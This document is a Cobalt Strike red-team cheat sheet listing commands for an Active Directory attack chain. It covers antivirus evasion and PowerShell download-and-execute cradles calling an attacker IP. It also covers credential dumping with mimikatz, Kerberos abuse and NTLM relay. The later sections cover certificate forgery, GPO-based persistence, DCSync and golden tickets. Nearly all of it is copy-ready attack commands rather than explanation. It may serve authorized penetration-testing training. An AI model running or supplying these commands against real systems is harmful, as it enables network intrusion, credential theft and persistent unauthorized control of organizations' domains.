Cobalt Strike Red Team Cheat Sheet
basic commands and tools to use during an engagement
Start CS
./teamserver <IP> <Password> <path_to_profile>
Implement Defense Evasion with artifact kit and resource kit
Modify src-common/bypass-pipe.c based on what threat checker flags on
rebuild payloads
./build.sh
pscp contents over and check test against ThreatChecker
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe
Threat Checker
C:\>Tools\ThreatCheck\ThreatCheck.exe -f <Path to artifact.exe>
Resource Kit
check what triggers on PS scripts
C:\>Tools\ThreatCheck\ThreatCheck.exe -e AMSI -f Tools\cobaltstrike\ResourceKit\template.x64.ps1
Using a simple Find & Replace for $x
- > $i
and $var_code
-> $var_banana
seems to be enough:
Powershell command for inital access
iex (new-object net.webclient).downloadstring("http://IPADDRESS/uri_path")
Host Enumeration for PrivEsc
Seatbelt - ton to sift through, start with SharpUp to start
execute-assembly C:\Tools\SeatBelt\Seatbelt.exe -group=system
SharpUp - make sure to build it
execute-assembly C:\Tools\SharpUp\SharpUp.exe
Get user ID and global group membership info
getuid
run net user <USER> /domain
Get services
run sc query
look for unquoted service paths with a space between
run wmic service get name, pathname
get permissions to unquoted service path
powershell Get-Acl -Path "Path to Vulnerable Services" | fl
Looking for BUILTIN\User with WriteAccess
Create peer-to-peer listener
go to Cobalt Strike -> Listeners -> Add -> Beacon TCP -> Save
CD to vulnerable service and replace the service with payload
upload C:\Payloads\beacon-tcp-svc.exe
mv beacon-p2p-tcp-svc.exe <name of vuln exe>
Start vuln service and connect to it
Stop service and start it
run sc stop <Service>
run sc start <Service>
look for listening on payload port (4444)
run netstat -anp tcp
then connect to the port
connect localhost <port>
Domain Recon with PowerView
PowerView
powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
Recon commands
# Get Domains for enterprise
powershell Get-Domain
# Get Domain Controllers
powershell Get-DomainController | select Forest, Name, OSVersion | fl
# Get Forests
powershell Get-ForestDomain
# Get domain policy
powershell Get-DomainPolicyData | select -ExpandProperty SystemAccess
# Get all the users
powershell Get-DomainUser
# Get Specific Domain User Properties
powershell Get-DomainUser -Identity <USER> -Properties DisplayName, MemberOf | fl
# Get Domain Computers (DNS Names)
powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
# Get Domain OUs
powershell Get-DomainOU -Properties Name | sort -Property Name
# Get Domain Groups
powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
# Get Domain Group Members
powershell Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
# Get GPOs
powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
# Get Workstation GPOs
powershell Get-DomainGPO -ComputerIdentity <WORKSTATION> -Properties DisplayName | sort -Property DisplayName
# Get GPOs that modify local groups membership
powershell Get-DomainGPOLocalGroup
# Get where user/group is member of specific local group
powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
# Get where logged on
powershell Find-DomainUserLocation | select UserName, SessionFromName
# Get current logged on sessions
powershell Get-NetSession -ComputerName <COMPUTERNAME> | select CName, UserName
# Get domain trusts
powershell Get-DomainTrust
Lateral Movement
Testing access
ls \\<HOSTNAME>\c$
Pivot Listeners
To start a Pivot Listener on an existing Beacon, right-click it and select Pivoting > Listener. Once started, your selected port will be bound on that machine.
run netstat -anp tcp
things to keep in mind:
If port 445 is closed on the target, you can't use SMB listeners.
If the target firewall doesn't allow arbitrary ports inbound, you can't use TCP listeners.
If the current machine doesn't allow arbitrary ports inbound, you can't use Pivot listeners. but if you have admin access on the target, you can change what ports are allowed.
To create FW rule on target:
netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444
To remove FW rule
netsh advfirewall firewall delete rule name="Allow 4444" protocol=TCP localport=4444
PS Remoting
jump winrm64 <HOSTNAME> <LISTENER>
PsExec
jump psexec64 <HOSTNAME> <LISTENER>
WMI
cd \\<TARGET HOST>\ADMIN$
upload <PATH TO PAYLOAD ON ATTACK COMPUTER>
remote-exec wmi <TARGET HOST> <PATH TO PAYLOAD ON TARGET COMPUTER>
link <TARGET HOST>
CoInitializeSecurity
If you get... CoInitializeSecurity already called. Thread token (if there is one) may not get used.
execute-assembly C:\Tools\SharpWMI\SharpWMI.exe action=exec computername=<TARGET> command="<PATH TO PAYLOAD ON TARGET>"
DCOM
powershell-import C:\Tools\Invoke-DCOM.ps1
powershell Invoke-DCOM -ComputerName <TARGET> -Method MMC20.Application -Command <PATH TO PAYLOAD ON TARGET>
link <TARGET HOST>
dump creds
# shorthand method
logonpasswords
# full command with mimi
mimikatz sekurlsa::logonpasswords
# Kerberos encryption keys
mimikatz sekurlsa::ekeys
# SAM Database
mimikatz lsadump::sam
# cached credentials
mimikatz lsadump::cache
After dumping these credentials, go to View > Credentials to see a copy of them.
The aes256_hmac and aes128_hmac (if available) fields are used with Overpass the Hash
Make Token
If we have the plaintext password (provided here), we can use make_token
with that information.
make_token <DOMAIN>\<USER> <Password>
Process injection
# List Processes
ps
# inject into target
inject <PID> <x64/x86> <listener-name>
Token Impersonation
# List Processes
ps
# Steal token
steal_token <PID>
SpawnAs
The spawnas
command will spawn a new process using the plaintext credentials of another user and inject a Beacon payload into it. This creates a new logon session with the interactive logon type which makes it good for local actions, but also creates a whole user profile on disk if not already present.
# Run from directory current user has access to
spawnas <Domain>\<USER> <PASSWORD> <LISTENER>
PassTheHash
pth <Domain>\<USER> <hash>
It passes the token over a named pipe which Beacon then impersonates automatically.
To avoid the \\.\pipe\
indicator, we can execute Mimikatz manually and specify our own process.
mimikatz sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH
## look for PID in the output
# steal token
steal_token <PID>
Over Pass The Hash
Rubeus allows us to perform opth without needing elevated privileges. The process to follow is:
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:jking /domain:child.test.local /rc4:4ffd3eabdce2e158d923ddec72de979e /nowrap
Open Powershell and copy the TGT
PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
or bash:
root@kali:~# echo -en "[...ticket...]" | base64 -d > jkingTGT.kirbi
Use the ticket
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
IF ELEVATED - WITH AES KEY
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:jking /domain:child.test.local /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec1 /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
# find pid and steal token
steal_token <PID>
Extracting Kerberos Tickets
# List all kerberos tickets
execute-assembly C:\Tools\Rubeus\Rubeus.exe triage
# dump TGT
execute-assembly C:\Tools\Rubeus\Rubeus.exe dump /service:krbtgt /luid:TARGET LUID /nowrap
# create sacrificial process
execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
# Pass the ticket into new process
execute-assembly C:\Tools\Rubeus\Rubeus.exe ptt /luid:NEW LUID /ticket:[...base64-ticket...]
# steal token
steal_token 4872
Socks Proxy
Start Socks Proxy on beacon
socks <PORT, Usually 9050 by default >
Confirm bind port on Kali
ss -lpnt
Update /etc/proxychains.conf
socks4 127.0.0.1 <socks port listed>
Scanning
proxychains nmap -n -Pn -sT -p<PORTS> <IP>
Reverse Port Forward
Open port on relay host
# empty template
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# example
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.100 connectport=4444 protocol=tcp
Test script to confirm inbound connections
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, 4444)
$listener = New-Object System.Net.Sockets.TcpListener $endpoint
$listener.Start()
Write-Host "Listening on port 4444"
while ($true)
{
$client = $listener.AcceptTcpClient()
Write-Host "A client has connected"
$client.Close()
}
connect from DC1 to AD
Test-NetConnection -ComputerName 10.10.10.100 -Port 4444
CS rportfwd
rportfwd <LOCAL PORT to Listen ON> <Destination IP> <DESTINATION PORT>
# confirm running
run netstat -anp tcp
Beacon also has a rportfwd_local
command. Whereas rportfwd
will tunnel traffic to the Team Server, rportfwd_local
will tunnel the traffic to the machine running the Cobalt Strike client.
# this example just forwards to itself
rportfwd_local 8080 127.0.0.1 8080
NTLM Relay
NTLM Relay with PortBender load driver first
upload C:\Tools\PortBender\WinDivert64.sys
Next, load PortBender.cna
from C:\Tools\PortBender
- this adds a new PortBender
command to the console. Redirect 445 traffic to 8445
PortBender redirect 445 8445
forward this to kali server
rportfwd 8445 127.0.0.1 445
confirm socks is on
socks 1080
NTLM relay to server to dump SAM database
proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://10.10.10.102 -smb2support --no-http-server --no-wcf-server
get command execution
proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://10.10.10.102 -smb2support --no-http-server --no-wcf-server -c
'powershell -nop -w hidden -c "iex (new-object net.webclient).downloadstring(\"http://10.10.10.100:8080/b\")"'
Credential Manager
List credentials stored
ls C:\Users\pickle.rick\AppData\Local\Microsoft\Credentials
run vaultcmd /listcreds:"Windows Credentials" /all
mimikatz vault::list
To decrypt the credential, we need to find the master encryption key.
mimikatz dpapi::cred /in:C:\Users\pickle.rick\AppData\Local\Microsoft\Credentials\<blob>
The pbData field contains the encrypted data and the guidMasterKey contains the GUID of the key needed to decrypt it. The Master Key information is stored within the user's AppData\Roaming\Microsoft\Protect
directory (where S-1-5-21-*
is their SID).
ls C:\Users\pickle.rick\AppData\Roaming\Microsoft\Protect\S-1-5-21-<USER SID>
There are a few ways to get the Master Key. If you have access to a high integrity session, run sekurlsa::dpapi
If not you can access it using mimikatz and an exposed RPC service on the DC. Run mimikatz dpapi::masterkey
, provide the path to the Master Key information and specify /rpc
mimikatz dpapi::masterkey /in:C:\Users\pickle.rick\AppData\Roaming\Microsoft\Protect\S-1-5-21-<USER SID>\<guidMasterKey> /rpc
The key field is the key needed to decrypt the credential dpapi::cred
.
mimikatz dpapi::cred /in:C:\Users\pickle.rick\AppData\Local\Microsoft\Credentials\blob /masterkey:<master key>
Chrome Credentials
execute-assembly C:\Tools\SharpChromium\SharpChromium.exe logins
Kerberoast
Rubeus kerberoast
can be used to perform the kerberoasting. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt).
execute-assembly C:\Tools\Rubeus\Rubeus.exe kerberoast /simple /nowrap
To find kerberoast accounts
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
for a specific account use /user
argument.
execute-assembly C:\Tools\Rubeus\Rubeus.exe kerberoast /user:svc_mssql /nowrap
cracking the hash
Use --format=krb5tgs --wordlist=wordlist svc_mssql
for john or -a 0 -m 13100 svc_mssql wordlist
for hashcat.
root@kali:~# john --format=krb5tgs --wordlist=wordlist svc_mssql
ASEP Roast
Find the account to roast
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
Start roasting
execute-assembly C:\Tools\Rubeus\Rubeus.exe asreproast /user:<USER> /nowrap
Use --format=krb5asrep --wordlist=wordlist svc_oracle
for john or -a 0 -m 18200 svc_oracle wordlist
for hashcat.
root@kali:~# john --format=krb5asrep --wordlist=wordlist <USER>
Unconstrained Delegation
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
Monitor for a specific TGT while on a server with unconstrained delegation
execute-assembly C:\Tools\Rubeus\Rubeus.exe monitor /targetuser:<USER> /interval:10
save ticket
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\user.kirbi", [System.Convert]::FromBase64String("..."))
Use ticket
make_token DOMAIN\USER Password
kerberos_ticket_use C:\Users\Administrator\Desktop\user.kirbi
Printer Bug
Monitor for a specific ticket from a server with unconstrained delegation
execute-assembly C:\Tools\Rubeus\Rubeus.exe monitor /targetuser:<TARGET>$ /interval:10 /nowrap
Force cohorsion with another wks
execute-assembly C:\Tools\SpoolSample\SpoolSample.exe <TARGET> <Unconstrained Host>
save ticket
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\target.kirbi", [System.Convert]::FromBase64String("..."))
Use token and use ticket
make_token DOMAIN\TARGET$ password
kerberos_ticket_use C:\Users\Administrator\Desktop\target.kirbi
Constrained Delegation
Find all accounts or computers with Constrained Delegation
execute-assembly C:\Tools\ADSearch\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
list current tickets
execute-assembly C:\Tools\Rubeus\Rubeus.exe triage
dump krbtgt
execute-assembly C:\Tools\Rubeus\Rubeus.exe dump /luid:<LUID> /service:krbtgt /nowrap
request the msdsspn for a constrained delegation user/server and a known user who can access it
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /impersonateuser:<USER> /msdsspn:cifs/wkstn-2.child.test.local /user:srv-2$ /ticket:do...= /nowrap
Create kirbi from ticket that was returned
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\dc-2.kirbi", [System.Convert]::FromBase64String("doI...="))
import kirbi file
make_token CHILD\USER password
kerberos_ticket_use C:\Users\Administrator\Desktop\cifs-workstation.kirbi
Alternate Service Name
dump krbtgt
execute-assembly C:\Tools\Rubeus\Rubeus.exe dump /luid:<LUID> /service:krbtgt /nowrap
request the msdsspn for a constrained delegation user/server and a known user who can access it
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /impersonateuser:<USER> /msdsspn:eventlog/dc.child.test.local /altservice:cifs /user:srv-2$ /ticket:do...=
/nowrap
Create kirbi from ticket that was returned
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\dc.kirbi", [System.Convert]::FromBase64String("doI...="))
import kirbi file
make_token CHILD\USER password
kerberos_ticket_use C:\Users\Administrator\Desktop\cifs-dc.kirbi
ls \\dc-2.child.test.local\c$
S4U2 Abuse
get ticket from target using spoolsample and unconstrained delegation to get a workstation$ TGT Monitor for a specific ticket from a server with unconstrained delegation
execute-assembly C:\Tools\Rubeus\Rubeus.exe monitor /targetuser:workstation$ /interval:10 /nowrap
Force cohorsion with another wks
execute-assembly C:\Tools\SpoolSample\SpoolSample.exe <TARGET> <UNCONSTRAINED Server>
save ticket
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\wkstn.kirbi", [System.Convert]::FromBase64String("..."))
then request a TGS, it will have a failure message at the bottom but thats okay we just want the TGS outputted
execute-assembly C:\Tools\Rubeus\Rubeus.exe s4u /user:<TARGET>$ /msdsspn:cifs/workstation.child.test.local /impersonateuser:nlamb /ticket:doIF...P /nowrap
save ticket
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\s4u2self.kirbi", [System.Convert]::FromBase64String("..."))
open TGS in ASN.1 Editor replace the general string wkstn-2$ to cifs or whatever service you want to impersonate. and add a node underneath with the hex 1b. give that new node a value of the FQDN.
confirm ticket is updated
C:\Tools\Rubeus\Rubeus.exe describe /ticket:C:\Users\Administrator\Desktop\s4u2self.kirbi
import kirbi file
make_token CHILD\USER password
kerberos_ticket_use C:\Users\Administrator\Desktop\cifs-dc.kirbi
Active Dirtectory Certificate Services
find vulnerable AD CD CA's
execute-assembly C:\Tools\Certify\Certify.exe cas
This configuration allows any domain user to request a certificate for any other domain user (including a domain admin), and use it to authenticate to the domain.
Take the private key and certificate. Copy and paste it into Kali and name it cert.pem
convert to pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Convert cert.pfx
into a base64 encoded string: cat cert.pfx | base64 -w 0
and use Rubeus asktgt
to request a TGT using this certificate.
Request TGT for target_user
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:target_user /certificate:... /password:password /aes256 /nowrap
NTLM Relaying to ADCS HTTP Endpoints
As SYSTEM on unconstrained delegation SRV:
PortBender redirect 445 8445
rportfwd 8445 127.0.0.1 445
socks 1080
Start ntlm relay
proxychains ntlmrelayx.py -t http://10.10.10.120/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
Next, use one of the remote authentication methods to force a connection from workstation to SRV.
execute-assembly C:\Tools\SpoolSample\SpoolSample.exe <TARGET> <UNCONSTRAINED Server>
After obtaining a TGT with the certificate, the S4U2self trick can be used to obtain a TGS for any service on the machine, on behalf of any user.
User Persistence
In this example, I have a Beacon running as TEST\USER. Use Certify to find all the certificates that permit client authentication:
execute-assembly C:\Tools\Certify\Certify.exe find /clientauth
execute-assembly C:\Tools\Certify\Certify.exe request /ca:dc.child.test.local\ca /template:User
This certificate allows us to request a TGT for TEST\USER using Rubeus
Computer Persistence
execute-assembly C:\Tools\Certify\Certify.exe request /ca:dc.child.test.local\ca /template:Machine /machine
The /machine
parameter tells Certify to auto-elevate to SYSTEM and assume the identity of the machine account.
Group Policy
This PowerView query will show the Security Identifiers (SIDs) of principals that can create new GPOs in the domain, which can be translated via ConvertFrom-SID
.
powershell Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=child,DC=test,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
powershell ConvertFrom-SID <SID>
This query will return the principals that can write to the GP-Link attribute on OUs:
powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
You can also get a list of machines within an OU.
powershell Get-DomainComputer | ? { $_.DistinguishedName -match "OU=<OU HERE>" } | select DnsHostName
This query will return any GPO in the domain, where a 4-digit RID has WriteProperty, WriteDacl or WriteOwner. Filtering on a 4-digit RID is a quick way to eliminate the default 5xx results.
powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "S-1-5-21-<DOMAIN SID>-[\d]{4,10}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
To resolve the ObjectDN:
powershell Get-DomainGPO -Name "<ObjectDN>" -Properties DisplayName
Remote Server Administration Tools (RSAT)
The GroupPolicy module has several PowerShell cmdlets that can be used for administering GPOs, including:
New-GPO: Create a new, empty GPO.
New-GPLink: Link a GPO to a site, domain or OU.
Set-GPPrefRegistryValue: Configures a Registry preference item under either Computer or User Configuration.
Set-GPRegistryValue: Configures one or more registry-based policy settings under either Computer or User Configuration.
Get-GPOReport: Generates a report in either XML or HTML format.
Create GPO with RSAT
powershell New-GPO -Name "Test GPO" | New-GPLink -Target "OU=<OU>,DC=<Domain>,DC=<Domain>,DC=<Domain>"
Being able to write anything, anywhere into the HKLM or HKCU provides the ability to gain perisistence on every hosy apart of the GPO
# Find Domain Share
powershell Find-DomainShare -CheckShareAccess
# Drop beacon payload off
cd \\dc\software
upload C:\Payloads\pivot.exe
# create registry value to run payload on boot in new GPO
powershell Set-GPPrefRegistryValue -Name "Test GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc\software\pivot.exe" -Type ExpandString
Force updates on a specific computer
run gpupdate /target:computer /force
SharpGPOAbuse
execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc\software\pivot.exe" --GPOName "PowerShell Logging"
Discretionary Access Control Lists
Look for GenericAll, WriteProperty or WriteDacl on user
powershell Get-DomainObjectAcl -Identity <USER> | ? { $_.ActiveDirectoryRights -match "GenericAll|WriteProperty|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-<DOMAIN SID>-[\d]{4,10}" } | select SecurityIdentifier, ActiveDirectoryRights | fl
We could also cast a wider net and target entire OUs.
powershell Get-DomainObjectAcl -SearchBase "CN=BLAH,DC=child,DC=test,DC=domain" | ? { $_.ActiveDirectoryRights -match "GenericAll|WriteProperty|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-<DOMAIN SID>-[\d]{4,10}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
With access like GenericAll we can change passwords, make an account kerberoastable, or modify domain membership
run net user <USER> <PASSWORD> /domain
create Kerberoast account
# assign SPN
powershell Set-DomainObject -Identity <USER> -Set @{serviceprincipalname="SOME/THING"}
powershell Get-DomainUser -Identity <USER> -Properties ServicePrincipalName
# kerberoast
execute-assembly C:\Tools\Rubeus\Rubeus.exe kerberoast /user:<USER> /nowrap
# clear spn
powershell Set-DomainObject -Identity <USER> -Clear ServicePrincipalName
Modify the User Account Control value on the account to disable preauthentication and then ASREProast it.
# Get current UAC Values to confirm original settings
powershell Get-DomainUser -Identity <USER> | ConvertFrom-UACValue
# add no pre-auth setting
powershell Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}
# ASREPRoast
execute-assembly C:\Tools\Rubeus\Rubeus.exe asreproast /user:<USER> /nowrap
# remove no pre-auth setting
powershell Set-DomainObject -Identity jadams -XOR @{UserAccountControl=4194304}
# confirm original settings
powershell Get-DomainUser -Identity jadams | ConvertFrom-UACValue
Modify Group Membership
run net group "Some Group" <USER> /add /domain
MS SQL
Find MS SQL servers
powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
powershell Get-SQLInstanceDomain
# Test Connection
powershell Get-SQLConnectionTest -Instance "<SERVER>" | fl
Get Info
powershell Get-SQLServerInfo -Instance "<SERVER>"
# Get info for all Accessible Servers
powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
Command Execution
powershell Invoke-SQLOSCmd -Instance "<SERVER>" -Command "whoami" -RawResults
To execute manually, try:
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
powershell Get-SQLQuery -Instance "<SERVER>" -Query "SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';"
# A value of **0** shows that xp_cmdshell is disabled. To enable it:
powershell Get-SQLQuery -Instance "<SERVER>" -Query "sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
# download and run payload
powershell Get-SQLQuery -Instance "sql.rto.local,1433" -Query "EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';"
Base64 encode command
$str = 'IEX((new-object net.webclient).downloadstring("http://<IP>:<PORT>/URI"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) | clip
MS SQL Privilege Escalation
NT Service\MSSQL$SQLEXPRESS
, is generally configured with a privilege called SeImpersonatePrivilege
. SweetPotato has a collection of these various techniques which can be executed via Beacon's execute-assembly
command.
# Confirm Privs
execute-assembly C:\Tools\SeatBelt\Seatbelt.exe TokenPrivileges
execute-assembly C:\Tools\SweetPotato\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc ..."
Domain Dominance
Add DCSync rights, if needed
powershell Add-DomainObjectAcl -TargetIdentity "DC=CHILD,DC=TEST,DC=LOCAL" -PrincipalIdentity <USER> -Rights DCSync
DCSync
dcsync child.DOMAIN.local CHILD\krbtgt
Golden Ticket
# create golden ticket
mimikatz kerberos::golden /user:Administrator /domain:child.DOMAIN.local /sid:S-1-5-21-<DOMAIN SID> /aes256:<KRBTGT AES HASH> /ticket:golden.kirbi
# use ticket
make_token DEV\Administrator password
# may need to download kirbi onto box if mimikatz was used on compromised host
kerberos_ticket_use C:\Users\Administrator\Desktop\golden.kirbi
# drop golden ticket
rev2self
Forged Certificates Once on a CA, SharpDPAPI can extract the private keys.
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Debug\SharpDPAPI.exe certificates /machine
The next step is to build the forged certificate with ForgeCert.
C:\Users\Administrator\Desktop>C:\Tools\ForgeCert\ForgeCert\bin\Debug\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password"
Even though you can specify any SubjectAltName, the user does need to be present in AD
Then we can simply use Rubeus to request a legitimate TGT with this forged certificate and use it to access the domain controller.
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:Administrator /domain:test.domain /certificate:<pfx cert> /password:password /nowrap
make_token TEST\Administrator password
kerberos_ticket_use C:\Users\Administrator\Desktop\admin-tgt.kirbi
Domain Trusts
Get Domain Trusts
powershell Get-DomainTrust
SourceName : child.test.local
TargetName : test.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
since there is a bidirectional trust in the child domain, we can forge a golden ticket for access into the parent domain
powershell Get-DomainGroup -Identity "Domain Admins" -Domain <PARENT DOMAIN> -Properties ObjectSid
Create ticket
mimikatz # kerberos::golden /user:Administrator /domain:child.test.local /sid:S-1-5-21-<Child domain SID> /sids:S-1-5-21-<Parent SID>-512 /aes256:<KRBTGT Hash> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:golden.kirbi
Where:
/user
is the username to impersonate./domain
is the current domain./sid
is the current domain SID./sids
is the SID of the target group to add ourselves to./aes256
is the AES256 key of the current domain's krbtgt account./startoffset
sets the start time of the ticket to 10 mins before the current time./endin
sets the expiry date for the ticket to 60 mins./renewmax
sets how long the ticket can be valid for if renewed.
Use ticket
make_token TEST\Administrator password
kerberos_ticket_use C:\Users\Administrator\Desktop\golden.kirbi
One-Way (Inbound)
powershell Get-DomainTrust
SourceName : child.test.local
TargetName : test.external
TrustType : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound
Because the trust is inbound from our perspective, it means that principals in our domain can be granted access to resources in the foreign domain. We can enumerate the foreign domain across the trust.
powershell Get-DomainComputer -Domain test.external -Properties DNSHostName
dnshostname
-----------
dc.test.external
Look for Foreign groups and return the members
powershell Get-DomainForeignGroupMember -Domain test.external
To hop the trust, we need to impersonate a member of this domain group.
If you only have the user's RC4/AES keys, we can still request Kerberos tickets with Rubeus but it's more involved. We need an inter-realm key which Rubeus won't produce for us automatically, so we have to do it manually.
First, we need a TGT for the principal in question. This TGT will come from the current domain.
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgt /user:<USER> /domain:child.test.local /aes256:<AES HASH> /opsec /nowrap
Next, request a referral ticket from the current domain, for the target domain.
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgs /service:krbtgt/test.external /domain:child.test.local /dc:dc.child.test.local /ticket: ... /nowrap
Finally, use this inter-realm TGT to request a TGS in the target domain.
execute-assembly C:\Tools\Rubeus\Rubeus.exe asktgs /service:cifs/dc.test.external /domain:dc.test.external /dc:dc.test.external /ticket: ... /nowrap
Create a sacrificial logon session and import the ticket.
make_token TEST\USER password
kerberos_ticket_use C:\Users\Administrator\Desktop\one-way-inbound.kirbi
One-Way (Outbound)
powershell Get-DomainTrust -Domain test.local
SourceName : test.local
TargetName : outbound.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Outbound
The strategy is to find principals in test.local
that are not native to that domain, but are from outbound.local
.
powershell Get-DomainForeignGroupMember -Domain test.local
GroupDomain : test.local
GroupName : Jump Users
GroupDistinguishedName : CN=Jump Users,CN=Users,DC=test,DC=local
MemberDomain : test.local
Find where there may be an computer where foreign users can rdp to, the goal is to get their creds once on a box inside of the compromised domain
powershell Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
Once the credentials or sessions is hijacked from a user from outbound.local, tools like PowerView can be used to enumerate the current user, domain, and possibly move laterally (permissions and open ports permitting)
Last updated
Was this helpful?